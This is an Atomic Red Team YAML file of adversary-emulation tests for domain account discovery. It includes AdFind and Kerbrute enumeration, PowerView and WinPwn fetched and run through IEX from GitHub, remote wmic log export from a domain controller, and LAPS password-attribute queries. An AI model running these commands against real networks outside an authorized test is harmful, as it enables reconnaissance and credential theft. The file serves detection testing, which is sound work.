security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1087.002/T1087.002.yaml
T
Hare Sudhan bfdd702717 Remove unused variable (#3040)
2025-01-28 00:02:41 -05:00

497 lines
24 KiB
YAML
Raw Permalink Blame History

attack_technique: T1087.002
display_name: 'Account Discovery: Domain Account'
atomic_tests:
- name: Enumerate all accounts (Domain)
auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e
description: |
Enumerate all accounts
Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
supported_platforms:
- windows
executor:
command: |
net user /domain
net group /domain
name: command_prompt
- name: Enumerate all accounts via PowerShell (Domain)
auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2
description: |
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
supported_platforms:
- windows
executor:
command: |
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
name: powershell
- name: Enumerate logged on users via CMD (Domain)
auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7
description: |
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
supported_platforms:
- windows
input_arguments:
computer_name:
description: Name of remote system to query
type: string
default: "%COMPUTERNAME%"
executor:
command: |
query user /SERVER:#{computer_name}
name: command_prompt
- name: Automated AD Recon (ADRecon)
auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59
description: |
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its
path will be displayed.
supported_platforms:
- windows
input_arguments:
adrecon_path:
description: Path of ADRecon.ps1 file
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1
dependency_executor_name: powershell
dependencies:
- description: |
ADRecon must exist on disk at specified location (#{adrecon_path})
prereq_command: |
if (Test-Path "#{adrecon_path}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}"
executor:
command: |
Invoke-Expression "#{adrecon_path}"
cleanup_command: |
Get-ChildItem "PathToAtomicsFolder\..\ExternalPayloads" -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
name: powershell
- name: Adfind -Listing password policy
auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
supported_platforms:
- windows
input_arguments:
optional_args:
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: |
AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
prereq_command: |
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
executor:
command: |
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
name: command_prompt
- name: Adfind - Enumerate Active Directory Admins
auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
supported_platforms:
- windows
input_arguments:
optional_args:
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: |
AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
prereq_command: |
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
executor:
command: |
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
name: command_prompt
- name: Adfind - Enumerate Active Directory User Objects
auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
- windows
input_arguments:
optional_args:
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: |
AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
prereq_command: |
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
executor:
command: |
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
name: command_prompt
- name: Adfind - Enumerate Active Directory Exchange AD Objects
auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
- windows
input_arguments:
optional_args:
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: |
AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
prereq_command: |
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
executor:
command: |
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
name: command_prompt
- name: Enumerate Default Domain Admin Details (Domain)
auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
description: |
This test will enumerate the details of the built-in domain admin account
supported_platforms:
- windows
executor:
command: |
net user administrator /domain
name: command_prompt
- name: Enumerate Active Directory for Unconstrained Delegation
auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
description: |
Attackers may attempt to query for computer objects with the UserAccountControl property
'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
supported_platforms:
- windows
input_arguments:
domain:
description: Domain FQDN
type: string
default: $env:UserDnsDomain
uac_prop:
description: UAC Property to search
type: integer
default: 524288
dependencies:
- description: |
PowerShell ActiveDirectory Module must be installed
prereq_command: |
Try {
Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
exit 0
}
Catch {
exit 1
}
get_prereq_command: |
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
Install-WindowsFeature RSAT-AD-PowerShell
}
executor:
name: powershell
elevation_required: false
command: |
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
- name: Get-DomainUser with PowerView
auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
description: |
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
name: powershell
- name: Enumerate Active Directory Users with ADSISearcher
auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
description: |
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
- name: Enumerate Linked Policies In ADSISearcher Discovery
auto_generated_guid: 7ab0205a-34e4-4a44-9b04-e1541d1a57be
description: |
The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
- name: Enumerate Root Domain linked policies Discovery
auto_generated_guid: 00c652e2-0750-4ca6-82ff-0204684a6fe4
description: |
The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
- name: WinPwn - generaldomaininfo
auto_generated_guid: ce483c35-c74b-45a7-a670-631d1e69db3d
description: Gathers general domain information using the generaldomaininfo function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
name: powershell
- name: Kerbrute - userenum
auto_generated_guid: f450461c-18d1-4452-9f0d-2c42c3f08624
description: Enumerates active directory usernames using the userenum function of Kerbrute
supported_platforms:
- windows
input_arguments:
Domain:
description: Domain that is being tested against
type: string
default: $env:USERDOMAIN
DomainController:
description: Domain Controller that is being tested against
type: string
default: $env:UserDnsDomain
dependency_executor_name: powershell
dependencies:
- description: |
kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads.
prereq_command: |
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
- description: |
username text file must exist in PathToAtomicsFolder\..\ExternalPayloads.
prereq_command: |
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\username.txt"){exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
executor:
command: |-
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
name: powershell
- name: Wevtutil - Discover NTLM Users Remote
auto_generated_guid: b8a563d4-a836-4993-a74e-0a19b8481bfe
description: |
This test discovers users who have authenticated against a Domain Controller via NTLM.
This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
supported_platforms:
- windows
executor:
command: |-
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
cleanup_command: |
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
name: powershell
- name: Suspicious LAPS Attributes Query with Get-ADComputer all properties
auto_generated_guid: 394012d9-2164-4d4f-b9e5-acf30ba933fe
description: This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
supported_platforms:
- windows
input_arguments:
hostname:
description: Name of the host
type: string
default: $env:computername
executor:
command: 'Get-ADComputer #{hostname} -Properties *'
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
auto_generated_guid: 6e85bdf9-7bc4-4259-ac0f-f0cb39964443
description: This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
supported_platforms:
- windows
input_arguments:
hostname:
description: Name of the host
type: string
default: $env:computername
executor:
command: 'Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime'
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
auto_generated_guid: ffbcfd62-15d6-4989-a21a-80bfc8e58bb5
description: This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
supported_platforms:
- windows
executor:
command: Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with adfind all properties
auto_generated_guid: abf00f6c-9983-4d9a-afbc-6b1c6c6448e1
description: This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
supported_platforms:
- windows
input_arguments:
optional_args:
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
type: string
default:
domain:
description: Domain of the host
type: string
default: $env:USERDOMAIN
executor:
command: |
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
auto_generated_guid: 51a98f96-0269-4e09-a10f-e307779a8b05
description: This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
supported_platforms:
- windows
input_arguments:
optional_args:
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
type: string
default:
domain:
description: Domain of the host
type: string
default: $env:USERDOMAIN
executor:
command: |
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
cleanup_command:
name: powershell
elevation_required: false
- name: Active Directory Domain Search
auto_generated_guid: 096b6d2a-b63f-4100-8fa0-525da4cd25ca
description: |
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
supported_platforms:
- linux
input_arguments:
domain:
description: The domain to be tested
type: string
default: example
top_level_domain:
description: The top level domain (.com, .test, .remote, etc... following domain, minus the .)
type: string
default: test
user:
description: username@domain of a user within the ad database
type: string
default: user@example.test
password:
description: password of the user with admin privileges referenced in admin_user
type: string
default: s3CurePssw0rD!
dependency_executor_name: sh
dependencies:
- description: |
Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
prereq_command: |
which ldapsearch
get_prereq_command: |
echo ldapsearch not found
executor:
elevation_required: false
command: |
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
name: sh
- name: Account Enumeration with LDAPDomainDump
auto_generated_guid: a54d497e-8dbe-4558-9895-44944baa395f
description: |
This test uses LDAPDomainDump to perform account enumeration on a domain.
[Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/)
supported_platforms:
- linux
input_arguments:
username:
description: Username and domain to authenticate with
type: string
default: domain\user
target_ip:
description: IP to connect to
type: string
default: 127.0.0.1
password:
description: Password to authenticate with
type: string
default: password
dependency_executor_name: sh
dependencies:
- description: Python3 must be installed
prereq_command: if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;
get_prereq_command: sudo apt-get -y install python3
- description: Pip must be installed
prereq_command: if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |-
wget -O /tmp/get-pip.py https://bootstrap.pypa.io/pip/3.6/get-pip.py
python3 /tmp/get-pip.py
- description: The ldapdomaindump module must be installed
prereq_command: python3 -c 'import ldapdomaindump' 2>/dev/null
get_prereq_command: pip install ldapdomaindump
- description: The future module must be installed
prereq_command: python3 -c 'import future' 2>/dev/null
get_prereq_command: pip install future
executor:
command: 'ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087'
cleanup_command: |
rm -rf /tmp/T1087/ 2>/dev/null
name: sh
elevation_required: false
Reference in New Issue View Git Blame Copy Permalink